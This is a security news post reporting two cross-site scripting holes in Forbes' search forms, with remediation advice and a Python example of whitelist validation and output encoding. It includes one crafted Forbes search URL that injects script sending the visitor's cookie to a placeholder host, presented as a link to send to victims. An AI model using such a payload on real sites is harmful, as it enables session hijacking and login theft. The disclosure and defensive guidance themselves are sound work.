Forbes Exploited: XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal Logins
Here's another delicious Byte. Ucha Gobejishvili, a Georgian security researcher who goes by the handle longrifle0x, discovered two cross-site scripting (XSS) vulnerabilities on the official website of Forbes. He found the holes in two different locations on the site and has already notified Forbes of the vulnerabilities.
The first of the two holes is located within the search form of Forbes. You can reach it at the following URL:
Using some obfuscation, it easily gets around Forbes' protection.
The second hole is located at yet another script within the search form on Forbes.
Again, using simple obfuscation, we see it slide right past their protection.
You could send a nasty URL to someone in a link on another website, and it would look pretty innocent.
http://search.forbes.com/search/colArchiveSearch?author=%22%3E%3Cscript%3Ealert%28document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie%29%3C/script%3E
Forbes should validate all of their forms, headers, and cookies. They should also render scripts and script tags non-executable by disallowing the special characters that make them work, which are the same characters we used for obfuscation. Only display output to the browser that has been sufficiently encoded. Where possible, avoid simple character filters (blacklists) and instead write routines that whitelist accepted characters. Use regular expressions to confirm that data conforms to the allowed character set. This improves application security and makes input validation routines much harder to bypass.
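As an added illustration of the two defenses described above (whitelist validation with a regular expression, and encoding every value before it is echoed into HTML), here is a small Python example. It is not Forbes' code; the parameter name author comes from the vulnerable URL, while the whitelist pattern, the function names and the sample inputs are constructed for this example.

```python
import html
import re
from urllib.parse import unquote

# Whitelist of characters an author name may contain. This policy is an
# assumption made for the example; a real application would derive it from
# its own data (letters, digits, spaces, apostrophes, periods and hyphens).
AUTHOR_RE = re.compile(r"^[A-Za-z0-9 .'\-]{1,64}$")


def validate_author(raw_param):
    """Decode the URL parameter and accept it only if every character is whitelisted.

    Returns the decoded string on success, or None if it should be rejected.
    The check runs on the decoded value so URL encoding cannot hide characters.
    """
    value = unquote(raw_param)
    return value if AUTHOR_RE.fullmatch(value) else None


def render_results_header(raw_param):
    """Build the HTML fragment a search page echoes back to the browser.

    Output encoding is applied unconditionally: even a value that slipped past
    validation is rendered as inert text because <, >, &, " and ' are escaped.
    """
    value = unquote(raw_param)
    return "<h2>Results for author: {}</h2>".format(html.escape(value, quote=True))


def handle_search(raw_param):
    """Combine both defenses: reject non-whitelisted input, encode what is echoed."""
    if validate_author(raw_param) is None:
        return "<h2>Invalid author parameter</h2>"
    return render_results_header(raw_param)


if __name__ == "__main__":
    # Constructed sample inputs: a normal name and a classic script-tag probe
    # in the same URL-encoded form as the parameter on the vulnerable page.
    for sample in ("Jane%20Doe", "%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E"):
        print(handle_search(sample))
        print(render_results_header(sample))
```

The whitelist rejects the probe outright, and even if the validation step were skipped, the encoded output contains no literal `<script>` tag for the browser to execute. Encoding at output time is the defense that holds regardless of how the input was obfuscated.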